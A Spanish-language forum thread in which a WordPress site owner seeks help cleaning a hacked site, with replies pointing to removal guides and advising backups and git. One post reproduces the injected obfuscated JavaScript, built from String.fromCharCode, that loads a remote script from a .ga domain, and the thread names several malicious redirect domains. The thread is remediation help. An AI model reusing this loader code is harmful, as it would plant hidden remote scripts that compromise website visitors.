Autor Tema: Ayuda con sitio web infectado  (Leído 2222 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado GUANAQUISIMO

  • Sv Member
  • ***
  • Mensajes: 144
  • No dejo de creer en El Salvador!
Ayuda con sitio web infectado
« : enero 25, 2021, 02:57:53 pm »
Buenas tardes senores, como estan?

Les solicito ayuda a los duros en wordpress

mi sitio web salio infectado con unas vainas que en https://securityscan.getastra.com/malware-scanner?site=https%3A%2F%2Fsisdeagro.comme da la siguiente informacion


Suspicious:JS/hexlikeunknown detected in http://main.travelfornamewalking.ga/det.php?sit=flex&sid=3&yuid=1&/wp-includes/js/jquery/jquery_js&ver=1.12.4-wp at line 2

Yo deseo saber en qué archivo esta la infeccion,

alguien me ayude por favor

muchas gracias,
saludos!


Desconectado xcero

  • Sv Member
  • ***
  • Mensajes: 453
  • xcero.xyz
    • Realidad Cero
Re:Ayuda con sitio web infectado
« Respuesta #1 : enero 25, 2021, 04:15:28 pm »
Saludos

Hay una guia  para específicamente los ataques del tipo 
Código: [Seleccionar]
https://js.xxxxxxxxxx.ga/stat.js?n=ns1\' type
Lo que hacen hincapié , es que tomes tu taza de café y hagas tu backup por que debes de eliminar algunos archivos de tu capeta publica (public_html)  , es decir detenidamente y de manera calmada

https://txnkaro.com/blog/how-to-clean-js-donatelloflowfirstly-ga-virus-from-wordpress-site/


Igual wordpress tiene su guia

https://wordpress.org/support/article/faq-my-site-was-hacked/
Sin conocimiento la habilidad no se puede enfocar, Sin habilidad, la fuerza no puede ser ejercida y sin fuerza, el conocimiento no puede ser aplicado.https://xcero.xyz

Desconectado xcero

  • Sv Member
  • ***
  • Mensajes: 453
  • xcero.xyz
    • Realidad Cero
Re:Ayuda con sitio web infectado
« Respuesta #2 : enero 25, 2021, 04:25:48 pm »
A mi me detecta el Clas/Adware
 https://callhimnamerstone.ga/
https://bitterblackwatter.ga

Cualquier hyperlink  en el sitio sisdeagro.com se dirige a Adware
« Última Modificación: enero 25, 2021, 04:28:58 pm por xcero »
Sin conocimiento la habilidad no se puede enfocar, Sin habilidad, la fuerza no puede ser ejercida y sin fuerza, el conocimiento no puede ser aplicado.https://xcero.xyz

Desconectado GUANAQUISIMO

  • Sv Member
  • ***
  • Mensajes: 144
  • No dejo de creer en El Salvador!
Re:Ayuda con sitio web infectado
« Respuesta #3 : enero 25, 2021, 07:46:10 pm »
Buenas noches senores,


Fijense que el tutorial que me envio xcero me sirvio pero ahora el codigo malicioso no es el mismo sino que esta codificado en ASCII


Código: [Seleccionar]
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,105,114,99,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);
Y resulta que todos los archivos .js o .json estan infectados (todos aparecen con permisos 777 tambien) los estoy removiendo manualmente (el código) pero son bastantes creo que mas de 200, la cosa es que tambien he seguido las sugerencias de la guia y espero poder removerlo, si puedo les cuento.  :yao_ming: :yao_ming: :yao_ming:

Muchas gracias!
« Última Modificación: enero 25, 2021, 07:48:28 pm por GUANAQUISIMO »

Desconectado GUANAQUISIMO

  • Sv Member
  • ***
  • Mensajes: 144
  • No dejo de creer en El Salvador!
Re:Ayuda con sitio web infectado
« Respuesta #4 : enero 25, 2021, 09:02:35 pm »
Aunque como puedo sustituir un texto en todos los archivos de una carpeta por ejemplo en wordpress? alguien me puede sugerir?

muchas gracias!

Desconectado xcero

  • Sv Member
  • ***
  • Mensajes: 453
  • xcero.xyz
    • Realidad Cero
Re:Ayuda con sitio web infectado
« Respuesta #5 : enero 26, 2021, 12:50:12 pm »
Hey ya funciona la mayoria de Enlaces del sitio , solo el English Spanish , veo que no cambia..

Yo soy aficionado , talvez haya alguien con mas experiencia en Worpress vea lo de search and replace

Yo me conecto via putty y a puro Vi, nano  veo los archivos y si de suerte el server tiene el Mc  mejor


Deberías ver el  Clamdscan  que traen los Server , a ver si te detecta algo mas

https://malware.expert/security/how-detect-malware/
Sin conocimiento la habilidad no se puede enfocar, Sin habilidad, la fuerza no puede ser ejercida y sin fuerza, el conocimiento no puede ser aplicado.https://xcero.xyz

Desconectado g00mba

  • The Communiter-
  • *
  • Mensajes: 14583
  • SOMOS LEGION
    • ALABADO SEA MONESVOL
Re:Ayuda con sitio web infectado
« Respuesta #6 : enero 26, 2021, 09:59:11 pm »
tu sitio no esta "infectado". a tu sitio lo atacaron. probablemente porque tenes pobres medidas de seguridad. la unica forma de que vas a estar seguro de que estas limpio es restaurando todo desde una copia de seguridad.  tenes que empezar a usar GIT. si tuvieras git solo purgas el sitio y lo restauras desde el repositorio. (idealmente deberias tener un pipeline de deployment). asi que aunque lo limpies te doy un par de dias antes de que te vuelva a pasar. seguridad de servidores señores, no la descuiden.

Desconectado GUANAQUISIMO

  • Sv Member
  • ***
  • Mensajes: 144
  • No dejo de creer en El Salvador!
Re:Ayuda con sitio web infectado
« Respuesta #7 : enero 29, 2021, 06:54:50 am »
Muchas gracias muy valida la apreciacion de g00mba

en eso estoy, muchas gracias!